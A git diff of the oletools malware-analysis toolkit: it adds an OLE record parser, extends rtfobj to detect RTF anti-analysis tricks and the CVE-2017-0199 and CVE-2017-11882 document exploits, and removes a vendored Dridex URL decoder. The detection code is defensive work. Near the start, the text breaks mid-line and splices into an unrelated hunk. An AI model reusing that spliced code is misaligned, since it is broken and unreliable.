+# LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR
+# CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF
+# SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS
+# INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN
+# CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
+# ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
+# POSSIBILITY OF SUCH DAMAGE.
+
+from __future__ import print_function
+
+# -----------------------------------------------------------------------------
+# CHANGELOG:
+# 2017-11-30 v0.01 CH: - first version based on xls_parser
+# 2018-09-11 v0.54 PL: - olefile is now a dependency
+# 2019-01-30 PL: - fixed import to avoid mixing installed oletools
+# and dev version
+
+__version__ = '0.54'
+
+# -----------------------------------------------------------------------------
+# TODO:
+# - read DocumentSummaryInformation first to get more info about streams
+# (maybe content type or so; identify streams that are never record-based)
+# Or use oleid to avoid same functionality in several files
+# - think about integrating this with olefile itself
+
+# -----------------------------------------------------------------------------
+# REFERENCES:
+# - [MS-XLS]: Excel Binary File Format (.xls) Structure Specification
+# https://msdn.microsoft.com/en-us/library/office/cc313154(v=office.14).aspx
+# - Understanding the Excel .xls Binary File Format
+# https://msdn.microsoft.com/en-us/library/office/gg615597(v=office.14).aspx
+# - [MS-PPT]
+
+
+import sys
+import os.path
+from io import SEEK_CUR
+import logging
+
+import olefile
+
+# little hack to allow absolute imports even if oletools is not installed.
+PARENT_DIR = os.path.normpath(os.path.dirname(os.path.dirname(
+ os.path.abspath(__file__))))
+if PARENT_DIR not in sys.path:
+ sys.path.insert(0, PARENT_DIR)
+del PARENT_DIR
+from oletools import oleid
+
+
+###############################################################################
+# Helpers
+###############################################################################
+
+OleFileIO = olefile.OleFileIO
+STGTY_EMPTY = olefile.STGTY_EMPTY # 0
+STGTY_STORAGE = olefile.STGTY_STORAGE # 1
+STGTY_STREAM = olefile.STGTY_STREAM # 2
+STGTY_LOCKBYTES = olefile.STGTY_LOCKBYTES # 3
+STGTY_PROPERTY = olefile.STGTY_PROPERTY # 4
+STGTY_ROOT = olefile.STGTY_ROOT # 5
+STGTY_SUBSTREAM = 10
+
+ENTRY_TYPE2STR = {
+ olefile.STGTY_EMPTY: 'empty',
+ olefile.STGTY_STORAGE: 'storage',
+ olefile.STGTY_STREAM: 'stream',
+ olefile.STGTY_LOCKBYTES: 'lock-bytes',
+ olefile.STGTY_PROPERTY: 'property',
+ olefile.STGTY_ROOT: 'root',
+ STGTY_SUBSTREAM: 'substream'
+}
+
+
+def enable_olefile_logging():
+ """ enable logging olefile e.g., to get debug info from OleFileIO """
+ olefile.enable_logging()
+
+
+###############################################################################
+# Base Classes
+###############################################################################
+
+
+SUMMARY_INFORMATION_STREAM_NAMES = ('\x05SummaryInformation',
+ '\x05DocumentSummaryInformation')
+
+
+class OleRecordFile(olefile.OleFileIO):
+ """ an OLE compound file whose streams have (mostly) record structure
+
+ 'record structure' meaning that streams are a sequence of records. Records
+ are structure with information about type and size in their first bytes
+ and type-dependent data of given size after that.
+
+ Subclass of OleFileIO!
+ """
+
+ def open(self, filename, *args, **kwargs):
+ """Call OleFileIO.open."""
+ #super(OleRecordFile, self).open(filename, *args, **kwargs)
+ OleFileIO.open(self, filename, *args, **kwargs)
+
+ @classmethod
+ def stream_class_for_name(cls, stream_name):
+ """ helper for iter_streams, must be overwritten in subclasses
+
+ will not be called for SUMMARY_INFORMATION_STREAM_NAMES
+ """
+ return OleRecordStream # this is an abstract class!
+
+ def iter_streams(self):
+ """ find all streams, including orphans """
+ logging.debug('Finding streams in ole file')
+
+ for sid, direntry in enumerate(self.direntries):
+ is_orphan = direntry is None
+ if is_orphan:
+ # this direntry is not part of the tree --> unused or orphan
+ direntry = self._load_direntry(sid)
+ is_stream = direntry.entry_type == olefile.STGTY_STREAM
+ logging.debug('direntry {:2d} {}: {}'.format(
+ sid, '[orphan]' if is_orphan else direntry.name,
+ 'is stream of size {}'.format(direntry.size) if is_stream else
+ 'no stream ({})'.format(ENTRY_TYPE2STR[direntry.entry_type])))
+ if is_stream:
+ if not is_orphan and \
+ direntry.name in SUMMARY_INFORMATION_STREAM_NAMES:
+ clz = OleSummaryInformationStream
+ else:
+ clz = self.stream_class_for_name(direntry.name)
+ stream = clz(self._open(direntry.isectStart, direntry.size),
+ direntry.size,
+ None if is_orphan else direntry.name,
+ direntry.entry_type)
+ yield stream
+ stream.close()
+
+
+class OleRecordStream(object):
+ """ a stream found in an OleRecordFile
+
+ Always has a name and a size (both read-only). Has an OleFileStream handle.
+
+ abstract base class
+ """
+
+ def __init__(self, stream, size, name, stream_type):
+ self.stream = stream
+ self.size = size
+ self.name = name
+ if stream_type not in ENTRY_TYPE2STR:
+ raise ValueError('Unknown stream type: {0}'.format(stream_type))
+ self.stream_type = stream_type
+
+ def read_record_head(self):
+ """ read first few bytes of record to determine size and type
+
+ Abstract base method, to be implemented in subclasses.
+
+ returns (rec_type, rec_size, other) where other will be forwarded to
+ record constructors
+ """
+ raise NotImplementedError('Abstract method '
+ 'OleRecordStream.read_record_head called')
+
+ @classmethod
+ def record_class_for_type(cls, rec_type):
+ """ determine a class for given record type
+
+ Only a base implementation. Create subclasses of OleRecordBase and
+ return those when appropriate.
+
+ returns (clz, force_read)
+ """
+ return OleRecordBase, False
+
+ def iter_records(self, fill_data=False):
+ """ yield all records in this stream
+
+ Stream must be positioned at start of records (e.g. start of stream).
+ """
+ while True:
+ # unpacking as in olevba._extract_vba
+ pos = self.stream.tell()
+ if pos >= self.size:
+ break
+
+ # read first few bytes, determine record type and size
+ rec_type, rec_size, other = self.read_record_head()
+ # logging.debug('Record type {0} of size {1}'
+ # .format(rec_type, rec_size))
+
+ # determine what class to wrap this into
+ rec_clz, force_read = self.record_class_for_type(rec_type)
+
+ if fill_data or force_read:
+ data = self.stream.read(rec_size)
+ if len(data) != rec_size:
+ raise IOError('Unexpected end of stream ({0} < {1})'
+ .format(len(data), rec_size))
+ else:
+ self.stream.seek(rec_size, SEEK_CUR)
+ data = None
+ rec_object = rec_clz(rec_type, rec_size, other, pos, data)
+
+ # "We are microsoft, we do not always adhere to our specifications"
+ rec_object.read_some_more(self.stream)
+ yield rec_object
+
+ def close(self):
+ self.stream.close()
+
+ def __str__(self):
+ return '[{0} {1} (type {2}, size {3})' \
+ .format(self.__class__.__name__,
+ self.name or '[orphan]',
+ ENTRY_TYPE2STR[self.stream_type],
+ self.size)
+
+
+class OleSummaryInformationStream(OleRecordStream):
+ """ stream for \05SummaryInformation and \05DocumentSummaryInformation
+
+ Do nothing so far. OleFileIO reads quite some info from this. For more info
+ see [MS-OSHARED] 2.3.3 and [MS-OLEPS] 2.21 and references therein.
+
+ See also: info read in oleid.py.
+ """
+ def iter_records(self, fill_data=False):
+ """ yields nothing, stops at once """
+ return
+ yield # required to make this a generator pylint: disable=unreachable
+
+
+class OleRecordBase(object):
+ """ a record found in an OleRecordStream
+
+ always has a type and a size, also pos and data
+ """
+
+ # for subclasses with a fixed type
+ TYPE = None
+
+ # (max) size of subclasses
+ MAX_SIZE = None
+ SIZE = None
+
+ def __init__(self, type, size, more_data, pos, data):
+ """ create a record; more_data is discarded """
+ if self.TYPE is not None and type != self.TYPE:
+ raise ValueError('Wrong subclass {0} for type {1}'
+ .format(self.__class__.__name__, type))
+ self.type = type
+ if self.SIZE is not None and size != self.SIZE:
+ raise ValueError('Wrong size {0} for record type {1}'
+ .format(size, type))
+ elif self.MAX_SIZE is not None and size > self.MAX_SIZE:
+ raise ValueError('Wrong size: {0} > MAX_SIZE for record type {1}'
+ .format(size, type))
+ self.size = size
+ self.pos = pos
+ self.data = data
+ self.finish_constructing(more_data)
+
+ def finish_constructing(self, more_data):
+ """ finish constructing this record
+
+ Can save more_data from OleRecordStream.read_record_head and/or parse
+ data (if it was read).
+
+ Base implementation, does nothing. To be overwritten in subclasses.
+
+ Implementations should take into account that self.data may be None.
+ Should create the same attributes, whether data is present or not. Eg::
+
+ def finish_constructing(self, more_data):
+ self.more = more_data
+ self.attr1 = None
+ self.attr2 = None
+ if self.data:
+ self.attr1, self.attr2 = struct.unpack(' 90:
+ value /= 60.
+ unit = 'min'
+ if value > 90:
+ value /= 60.
+ unit = 'h'
+ if value > 72:
+ value /= 24.
+ unit = 'days'
+ return '{0:.1f}{1}'.format(value, unit)
#=== CLASSES =================================================================
@@ -356,6 +405,20 @@ def __init__(self, data):
self.destinations = [document_destination]
self.current_destination = document_destination
+ def _report_progress(self, start_time):
+ """ report progress on parsing at regular intervals """
+ now = float(time())
+ if now == start_time or self.size == 0:
+ return # avoid zero-division
+ percent_done = 100. * self.index / self.size
+ time_per_index = (now - start_time) / float(self.index)
+ finish_estim = float(self.size - self.index) * time_per_index
+
+ log.debug('After {0} finished {1:4.1f}% of current file ({2} bytes); '
+ 'will finish in approx {3}'
+ .format(duration_str(now-start_time), percent_done,
+ self.size, duration_str(finish_estim)))
+
def parse(self):
"""
Parse the RTF data
@@ -364,8 +427,13 @@ def parse(self):
"""
# Start at beginning of data
self.index = 0
+ start_time = time()
+ last_report = start_time
# Loop until the end
while self.index < self.size:
+ if time() - last_report > 15: # report every 15s
+ self._report_progress(start_time)
+ last_report = time()
if self.data[self.index] == BRACE_OPEN:
# Found an opening brace "{": Start of a group
self._open_group()
@@ -382,9 +450,7 @@ def parse(self):
# NOTE: the full length of the control word + its optional integer parameter
# is limited by MS Word at 253 characters, so we have to run the regex
# on a cropped string:
- data_cropped = self.data[self.index:]
- if len(data_cropped)>253:
- data_cropped = data_cropped[:254]
+ data_cropped = self.data[self.index:self.index+254]
# append a space so that the regex can check the following character:
data_cropped += b' '
# m = re_control_word.match(self.data, self.index, self.index+253)
@@ -489,7 +555,7 @@ def _control_word(self, matchobject, cword, param):
# TODO: according to RTF specs v1.9.1, "Destination changes are legal only immediately after an opening brace ({)"
# (not counting the special control symbol \*, of course)
if cword in DESTINATION_CONTROL_WORDS:
- # log.debug('%r is a destination control word: starting a new destination' % cword)
+ log.debug('%r is a destination control word: starting a new destination at index %Xh' % (cword, self.index))
self._open_destination(matchobject, cword)
# call the corresponding user method for additional processing:
self.control_word(matchobject, cword, param)
@@ -511,16 +577,20 @@ def text(self, matchobject, text):
pass
def _bin(self, matchobject, param):
- binlen = int(param)
+ if param is None:
+ log.info('Detected anti-analysis trick: \\bin object without length at index %X' % self.index)
+ binlen = 0
+ else:
+ binlen = int(param)
# handle negative length
if binlen < 0:
- log.warn('Detected anti-analysis trick: \\bin object with negative length at index %X' % self.index)
+ log.info('Detected anti-analysis trick: \\bin object with negative length at index %X' % self.index)
# binlen = int(param.strip('-'))
# According to my tests, if the bin length is negative,
# it should be treated as a null length:
binlen=0
# ignore optional space after \bin
- if self.data[self.index] == ' ':
+ if ord(self.data[self.index:self.index + 1]) == ord(' '):
log.debug('\\bin: ignoring whitespace before data')
self.index += 1
log.debug('\\bin: reading %d bytes of binary data' % binlen)
@@ -571,6 +641,10 @@ def __init__(self):
self.filename = None
self.src_path = None
self.temp_path = None
+ # Additional OLE object data
+ self.clsid = None
+ self.clsid_desc = None
+
@@ -611,29 +685,39 @@ def close_destination(self, destination):
rtfobj.hexdata = hexdata
object_data = binascii.unhexlify(hexdata)
rtfobj.rawdata = object_data
+ rtfobj.rawdata_md5 = hashlib.md5(object_data).hexdigest()
# TODO: check if all hex data is extracted properly
- obj = OleObject()
+ obj = oleobj.OleObject()
try:
obj.parse(object_data)
rtfobj.format_id = obj.format_id
rtfobj.class_name = obj.class_name
rtfobj.oledata_size = obj.data_size
rtfobj.oledata = obj.data
+ rtfobj.oledata_md5 = hashlib.md5(obj.data).hexdigest()
rtfobj.is_ole = True
- if obj.class_name.lower() == 'package':
- opkg = OleNativeStream(bindata=obj.data, package=True)
+ if obj.class_name.lower() == b'package':
+ opkg = oleobj.OleNativeStream(bindata=obj.data,
+ package=True)
rtfobj.filename = opkg.filename
rtfobj.src_path = opkg.src_path
rtfobj.temp_path = opkg.temp_path
rtfobj.olepkgdata = opkg.data
+ rtfobj.olepkgdata_md5 = hashlib.md5(opkg.data).hexdigest()
rtfobj.is_package = True
+ else:
+ if olefile.isOleFile(obj.data):
+ ole = olefile.OleFileIO(obj.data)
+ rtfobj.clsid = ole.root.clsid
+ rtfobj.clsid_desc = clsid.KNOWN_CLSIDS.get(rtfobj.clsid,
+ 'unknown CLSID (please report at https://github.com/decalage2/oletools/issues)')
except:
pass
log.debug('*** Not an OLE 1.0 Object')
def bin(self, bindata):
- if self.current_destination.cword == 'objdata':
+ if self.current_destination.cword == b'objdata':
# TODO: keep track of this, because it is unusual and indicates potential obfuscation
# trick: hexlify binary data, add it to hex data
self.current_destination.data += binascii.hexlify(bindata)
@@ -645,6 +729,28 @@ def control_word(self, matchobject, cword, param):
# log.debug('- Control word "%s", param=%s, level=%d' % (cword, param, self.group_level))
pass
+ def control_symbol(self, matchobject):
+ # log.debug('control symbol %r at index %Xh' % (matchobject.group(), self.index))
+ symbol = matchobject.group()[1:2]
+ if symbol == b"'":
+ # read the two hex digits following "\'" - which can be any characters, not just hex digits
+ # (because within an objdata destination, they are simply ignored)
+ hexdigits = self.data[self.index+2:self.index+4]
+ # print(hexdigits)
+ # move the index two bytes forward
+ self.index += 2
+ if self.current_destination.cword == b'objdata':
+ # Here's the tricky part: there is a bug in the MS Word RTF parser at least
+ # until Word 2016, that removes the last hex digit before the \'hh control
+ # symbol, ONLY IF the number of hex digits read so far is odd.
+ # So to emulate that bug, we have to clean the data read so far by keeping
+ # only the hex digits:
+ # Filter out any non-hex character:
+ self.current_destination.data = re.sub(b'[^a-fA-F0-9]', b'', self.current_destination.data)
+ if len(self.current_destination.data) & 1 == 1:
+ # If the number of hex digits is odd, remove the last one:
+ self.current_destination.data = self.current_destination.data[:-1]
+
#=== FUNCTIONS ===============================================================
@@ -668,7 +774,50 @@ def rtf_iter_objects(filename, min_size=32):
yield obj.start, orig_len, obj.rawdata
+def is_rtf(arg, treat_str_as_data=False):
+ """ determine whether given file / stream / array represents an rtf file
+
+ arg can be either a file name, a byte stream (located at start), a
+ list/tuple or a an iterable that contains bytes.
+ For str it is not clear whether data is a file name or the data read from
+ it (at least for py2-str which is bytes). Argument treat_str_as_data
+ clarifies.
+ """
+ magic_len = len(RTF_MAGIC)
+ if isinstance(arg, UNICODE_TYPE):
+ with open(arg, 'rb') as reader:
+ return reader.read(len(RTF_MAGIC)) == RTF_MAGIC
+ if isinstance(arg, bytes) and not isinstance(arg, str): # only in PY3
+ return arg[:magic_len] == RTF_MAGIC
+ if isinstance(arg, bytearray):
+ return arg[:magic_len] == RTF_MAGIC
+ if isinstance(arg, str): # could be bytes, but we assume file name
+ if treat_str_as_data:
+ try:
+ return arg[:magic_len].encode('ascii', errors='strict')\
+ == RTF_MAGIC
+ except UnicodeError:
+ return False
+ else:
+ with open(arg, 'rb') as reader:
+ return reader.read(len(RTF_MAGIC)) == RTF_MAGIC
+ if hasattr(arg, 'read'): # a stream (i.e. file-like object)
+ return arg.read(len(RTF_MAGIC)) == RTF_MAGIC
+ if isinstance(arg, (list, tuple)):
+ iter_arg = iter(arg)
+ else:
+ iter_arg = arg
+
+ # check iterable
+ for magic_byte in zip(RTF_MAGIC):
+ try:
+ if next(iter_arg) not in magic_byte:
+ return False
+ except StopIteration:
+ return False
+
+ return True # checked the complete magic without returning False --> match
def sanitize_filename(filename, replacement='_', max_length=200):
@@ -712,15 +861,14 @@ def process_file(container, filename, data, output_dir=None, save_object=False):
print('='*79)
print('File: %r - size: %d bytes' % (filename, len(data)))
tstream = tablestream.TableStream(
- column_width=(3, 10, 31, 31),
- header_row=('id', 'index', 'OLE Object', 'OLE Package'),
+ column_width=(3, 10, 63),
+ header_row=('id', 'index', 'OLE Object'),
style=tablestream.TableStyleSlim
)
rtfp = RtfObjParser(data)
rtfp.parse()
for rtfobj in rtfp.objects:
ole_color = None
- pkg_color = None
if rtfobj.is_ole:
ole_column = 'format_id: %d ' % rtfobj.format_id
if rtfobj.format_id == oleobj.OleObject.TYPE_EMBEDDED:
@@ -736,33 +884,66 @@ def process_file(container, filename, data, output_dir=None, save_object=False):
else:
ole_column += 'data size: %d' % rtfobj.oledata_size
if rtfobj.is_package:
- pkg_column = 'Filename: %r\n' % rtfobj.filename
- pkg_column += 'Source path: %r\n' % rtfobj.src_path
- pkg_column += 'Temp path = %r' % rtfobj.temp_path
- pkg_color = 'yellow'
+ ole_column += '\nOLE Package object:'
+ ole_column += '\nFilename: %r' % rtfobj.filename
+ ole_column += '\nSource path: %r' % rtfobj.src_path
+ ole_column += '\nTemp path = %r' % rtfobj.temp_path
+ ole_column += '\nMD5 = %r' % rtfobj.olepkgdata_md5
+ ole_color = 'yellow'
# check if the file extension is executable:
- _, ext = os.path.splitext(rtfobj.filename)
- log.debug('File extension: %r' % ext)
- if re_executable_extensions.match(ext):
- pkg_color = 'red'
- pkg_column += '\nEXECUTABLE FILE'
+
+ _, temp_ext = os.path.splitext(rtfobj.temp_path)
+ log.debug('Temp path extension: %r' % temp_ext)
+ _, file_ext = os.path.splitext(rtfobj.filename)
+ log.debug('File extension: %r' % file_ext)
+
+ if temp_ext != file_ext:
+ ole_column += "\nMODIFIED FILE EXTENSION"
+
+ if re_executable_extensions.match(temp_ext) or re_executable_extensions.match(file_ext):
+ ole_color = 'red'
+ ole_column += '\nEXECUTABLE FILE'
else:
- pkg_column = 'Not an OLE Package'
+ ole_column += '\nMD5 = %r' % rtfobj.oledata_md5
+ if rtfobj.clsid is not None:
+ ole_column += '\nCLSID: %s' % rtfobj.clsid
+ ole_column += '\n%s' % rtfobj.clsid_desc
+ if 'CVE' in rtfobj.clsid_desc:
+ ole_color = 'red'
# Detect OLE2Link exploit
# http://www.kb.cert.org/vuls/id/921560
- if rtfobj.class_name == 'OLE2Link':
+ if rtfobj.class_name == b'OLE2Link':
+ ole_color = 'red'
+ ole_column += '\nPossibly an exploit for the OLE2Link vulnerability (VU#921560, CVE-2017-0199)\n'
+ # https://bitbucket.org/snippets/Alexander_Hanel/7Adpp
+ found_list = re.findall(r'[a-fA-F0-9\x0D\x0A]{128,}',data)
+ urls = []
+ for item in found_list:
+ try:
+ temp = item.replace("\x0D\x0A","").decode("hex")
+ except:
+ continue
+ pat = re.compile(r'(?:[\x20-\x7E][\x00]){3,}')
+ words = [w.decode('utf-16le') for w in pat.findall(temp)]
+ for w in words:
+ if "http" in w:
+ urls.append(w)
+ urls = sorted(set(urls))
+ if urls:
+ ole_column += 'URL extracted: ' + ', '.join(urls)
+ # Detect Equation Editor exploit
+ # https://www.kb.cert.org/vuls/id/421280/
+ elif rtfobj.class_name.lower().startswith(b'equation.3'):
ole_color = 'red'
- ole_column += '\nPossibly an exploit for the OLE2Link vulnerability (VU#921560, CVE-2017-0199)'
+ ole_column += '\nPossibly an exploit for the Equation Editor vulnerability (VU#421280, CVE-2017-11882)'
else:
- pkg_column = ''
ole_column = 'Not a well-formed OLE object'
tstream.write_row((
rtfp.objects.index(rtfobj),
# filename,
'%08Xh' % rtfobj.start,
- ole_column,
- pkg_column
- ), colors=(None, None, ole_color, pkg_color)
+ ole_column
+ ), colors=(None, None, ole_color)
)
tstream.write_sep()
if save_object:
@@ -788,6 +969,7 @@ def process_file(container, filename, data, output_dir=None, save_object=False):
else:
fname = '%s_object_%08X.noname' % (fname_prefix, rtfobj.start)
print(' saving to file %s' % fname)
+ print(' md5 %s' % rtfobj.olepkgdata_md5)
open(fname, 'wb').write(rtfobj.olepkgdata)
# When format_id=TYPE_LINKED, oledata_size=None
elif rtfobj.is_ole and rtfobj.oledata_size is not None:
@@ -805,11 +987,13 @@ def process_file(container, filename, data, output_dir=None, save_object=False):
ext = 'bin'
fname = '%s_object_%08X.%s' % (fname_prefix, rtfobj.start, ext)
print(' saving to file %s' % fname)
+ print(' md5 %s' % rtfobj.oledata_md5)
open(fname, 'wb').write(rtfobj.oledata)
else:
print('Saving raw data in object #%d:' % i)
fname = '%s_object_%08X.raw' % (fname_prefix, rtfobj.start)
print(' saving object to file %s' % fname)
+ print(' md5 %s' % rtfobj.rawdata_md5)
open(fname, 'wb').write(rtfobj.rawdata)
@@ -817,7 +1001,9 @@ def process_file(container, filename, data, output_dir=None, save_object=False):
def main():
# print banner with version
- print ('rtfobj %s - http://decalage.info/python/oletools' % __version__)
+ python_version = '%d.%d.%d' % sys.version_info[0:3]
+ print ('rtfobj %s on Python %s - http://decalage.info/python/oletools' %
+ (__version__, python_version))
print ('THIS IS WORK IN PROGRESS - Check updates regularly!')
print ('Please report any issue at https://github.com/decalage2/oletools/issues')
print ('')
@@ -891,4 +1077,3 @@ def main():
main()
# This code was developed while listening to The Mary Onettes "Lost"
-
diff --git a/oletools/thirdparty/DridexUrlDecoder/DridexUrlDecoder.py b/oletools/thirdparty/DridexUrlDecoder/DridexUrlDecoder.py
deleted file mode 100644
index 4c083b3e..00000000
--- a/oletools/thirdparty/DridexUrlDecoder/DridexUrlDecoder.py
+++ /dev/null
@@ -1,42 +0,0 @@
-# Written by @JamesHabben
-# https://github.com/JamesHabben/MalwareStuff
-
-# 2015-01-27 Slight modifications from Philippe Lagadec (PL) to use it from olevba
-
-import sys
-
-def DridexUrlDecode (inputText) :
- work = inputText[4:-4]
- strKeyEnc = StripCharsWithZero(work[(len(work) / 2) - 2: (len(work) / 2)])
- strKeySize = StripCharsWithZero(work[(len(work) / 2): (len(work) / 2) + 2])
- nCharSize = strKeySize - strKeyEnc
- work = work[:(len(work) / 2) - 2] + work[(len(work) / 2) + 2:]
- strKeyEnc2 = StripChars(work[(len(work) / 2) - (nCharSize/2): (len(work) / 2) + (nCharSize/2)])
- work = work[:(len(work) / 2) - (nCharSize/2)] + work[(len(work) / 2) + (nCharSize/2):]
- work_split = [work[i:i+nCharSize] for i in range(0, len(work), nCharSize)]
- decoded = ''
- for group in work_split:
- # sys.stdout.write(chr(StripChars(group)/strKeyEnc2))
- decoded += chr(StripChars(group)/strKeyEnc2)
- return decoded
-
-def StripChars (input) :
- result = ''
- for c in input :
- if c.isdigit() :
- result += c
- return int(result)
-
-def StripCharsWithZero (input) :
- result = ''
- for c in input :
- if c.isdigit() :
- result += c
- else:
- result += '0'
- return int(result)
-
-
-# DridexUrlDecode("C3iY1epSRGe6q8g15xStVesdG717MAlg2H4hmV1vkL6Glnf0cknj")
-# DridexUrlDecode("HLIY3Nf3z2k8jD37h1n2OM3N712DGQ3c5M841RZ8C5e6P1C50C4ym1oF504WyV182p4mJ16cK9Z61l47h2dU1rVB5V681sFY728i16H3E2Qm1fn47y2cgAo156j8T1s600hukKO1568X1xE4Z7d2q17jvcwgk816Yz32o9Q216Mpr0B01vcwg856a17b9j2zAmWf1536B1t7d92rI1FZ5E36Pu1jl504Z34tm2R43i55Lg2F3eLE3T28lLX1D504348Goe8Gbdp37w443ADy36X0h14g7Wb2G3u584kEG332Ut8ws3wO584pzSTf")
-# DridexUrlDecode("YNPH1W47E211z3P6142cM4115K2J1696CURf1712N1OCJwc0w6Z16840Z1r600W16Z3273k6SR16Bf161Q92a016Vr16V1pc")
diff --git a/oletools/thirdparty/DridexUrlDecoder/LICENSE.txt b/oletools/thirdparty/DridexUrlDecoder/LICENSE.txt
deleted file mode 100644
index f29a1c34..00000000
--- a/oletools/thirdparty/DridexUrlDecoder/LICENSE.txt
+++ /dev/null
@@ -1,3 +0,0 @@
-DridexUrlDecoder.py is published by James Habben (@JamesHabben)
-on https://github.com/JamesHabben/MalwareStuff
-without explicit license.
\ No newline at end of file
diff --git a/oletools/thirdparty/colorclass/LICENSE.txt b/oletools/thirdparty/colorclass/LICENSE.txt
deleted file mode 100644
index d42eea76..00000000
--- a/oletools/thirdparty/colorclass/LICENSE.txt
+++ /dev/null
@@ -1,21 +0,0 @@
-The MIT License (MIT)
-
-Copyright (c) 2014 Robpol86
-
-Permission is hereby granted, free of charge, to any person obtaining a copy
-of this software and associated documentation files (the "Software"), to deal
-in the Software without restriction, including without limitation the rights
-to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
-copies of the Software, and to permit persons to whom the Software is
-furnished to do so, subject to the following conditions:
-
-The above copyright notice and this permission notice shall be included in all
-copies or substantial portions of the Software.
-
-THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
-IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
-FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
-AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
-LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
-OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
-SOFTWARE.
diff --git a/oletools/thirdparty/colorclass/__init__.py b/oletools/thirdparty/colorclass/__init__.py
deleted file mode 100644
index cae4016b..00000000
--- a/oletools/thirdparty/colorclass/__init__.py
+++ /dev/null
@@ -1,38 +0,0 @@
-"""Colorful worry-free console applications for Linux, Mac OS X, and Windows.
-
-Supported natively on Linux and Mac OSX (Just Works), and on Windows it works the same if Windows.enable() is called.
-
-Gives you expected and sane results from methods like len() and .capitalize().
-
-https://github.com/Robpol86/colorclass
-https://pypi.python.org/pypi/colorclass
-"""
-
-from colorclass.codes import list_tags # noqa
-from colorclass.color import Color # noqa
-from colorclass.toggles import disable_all_colors # noqa
-from colorclass.toggles import disable_if_no_tty # noqa
-from colorclass.toggles import enable_all_colors # noqa
-from colorclass.toggles import is_enabled # noqa
-from colorclass.toggles import is_light # noqa
-from colorclass.toggles import set_dark_background # noqa
-from colorclass.toggles import set_light_background # noqa
-from colorclass.windows import Windows # noqa
-
-
-__all__ = (
- 'Color',
- 'disable_all_colors',
- 'enable_all_colors',
- 'is_enabled',
- 'is_light',
- 'list_tags',
- 'set_dark_background',
- 'set_light_background',
- 'Windows',
-)
-
-
-__author__ = '@Robpol86'
-__license__ = 'MIT'
-__version__ = '2.2.0'
diff --git a/oletools/thirdparty/colorclass/__main__.py b/oletools/thirdparty/colorclass/__main__.py
deleted file mode 100644
index d8f3f001..00000000
--- a/oletools/thirdparty/colorclass/__main__.py
+++ /dev/null
@@ -1,33 +0,0 @@
-"""Called by "python -m". Allows package to be used as a script.
-
-Example usage:
-echo "{red}Red{/red}" |python -m colorclass
-"""
-
-from __future__ import print_function
-
-import fileinput
-import os
-
-from colorclass.color import Color
-from colorclass.toggles import disable_all_colors
-from colorclass.toggles import enable_all_colors
-from colorclass.toggles import set_dark_background
-from colorclass.toggles import set_light_background
-from colorclass.windows import Windows
-
-TRUTHY = ('true', '1', 'yes', 'on')
-
-
-if __name__ == '__main__':
- if os.environ.get('COLOR_ENABLE', '').lower() in TRUTHY:
- enable_all_colors()
- elif os.environ.get('COLOR_DISABLE', '').lower() in TRUTHY:
- disable_all_colors()
- if os.environ.get('COLOR_LIGHT', '').lower() in TRUTHY:
- set_light_background()
- elif os.environ.get('COLOR_DARK', '').lower() in TRUTHY:
- set_dark_background()
- Windows.enable()
- for LINE in fileinput.input():
- print(Color(LINE))
diff --git a/oletools/thirdparty/colorclass/codes.py b/oletools/thirdparty/colorclass/codes.py
deleted file mode 100644
index b0ecb03a..00000000
--- a/oletools/thirdparty/colorclass/codes.py
+++ /dev/null
@@ -1,229 +0,0 @@
-"""Handles mapping between color names and ANSI codes and determining auto color codes."""
-
-import sys
-from collections import Mapping
-
-BASE_CODES = {
- '/all': 0, 'b': 1, 'f': 2, 'i': 3, 'u': 4, 'flash': 5, 'outline': 6, 'negative': 7, 'invis': 8, 'strike': 9,
- '/b': 22, '/f': 22, '/i': 23, '/u': 24, '/flash': 25, '/outline': 26, '/negative': 27, '/invis': 28,
- '/strike': 29, '/fg': 39, '/bg': 49,
-
- 'black': 30, 'red': 31, 'green': 32, 'yellow': 33, 'blue': 34, 'magenta': 35, 'cyan': 36, 'white': 37,
-
- 'bgblack': 40, 'bgred': 41, 'bggreen': 42, 'bgyellow': 43, 'bgblue': 44, 'bgmagenta': 45, 'bgcyan': 46,
- 'bgwhite': 47,
-
- 'hiblack': 90, 'hired': 91, 'higreen': 92, 'hiyellow': 93, 'hiblue': 94, 'himagenta': 95, 'hicyan': 96,
- 'hiwhite': 97,
-
- 'hibgblack': 100, 'hibgred': 101, 'hibggreen': 102, 'hibgyellow': 103, 'hibgblue': 104, 'hibgmagenta': 105,
- 'hibgcyan': 106, 'hibgwhite': 107,
-
- 'autored': None, 'autoblack': None, 'automagenta': None, 'autowhite': None, 'autoblue': None, 'autoyellow': None,
- 'autogreen': None, 'autocyan': None,
-
- 'autobgred': None, 'autobgblack': None, 'autobgmagenta': None, 'autobgwhite': None, 'autobgblue': None,
- 'autobgyellow': None, 'autobggreen': None, 'autobgcyan': None,
-
- '/black': 39, '/red': 39, '/green': 39, '/yellow': 39, '/blue': 39, '/magenta': 39, '/cyan': 39, '/white': 39,
- '/hiblack': 39, '/hired': 39, '/higreen': 39, '/hiyellow': 39, '/hiblue': 39, '/himagenta': 39, '/hicyan': 39,
- '/hiwhite': 39,
-
- '/bgblack': 49, '/bgred': 49, '/bggreen': 49, '/bgyellow': 49, '/bgblue': 49, '/bgmagenta': 49, '/bgcyan': 49,
- '/bgwhite': 49, '/hibgblack': 49, '/hibgred': 49, '/hibggreen': 49, '/hibgyellow': 49, '/hibgblue': 49,
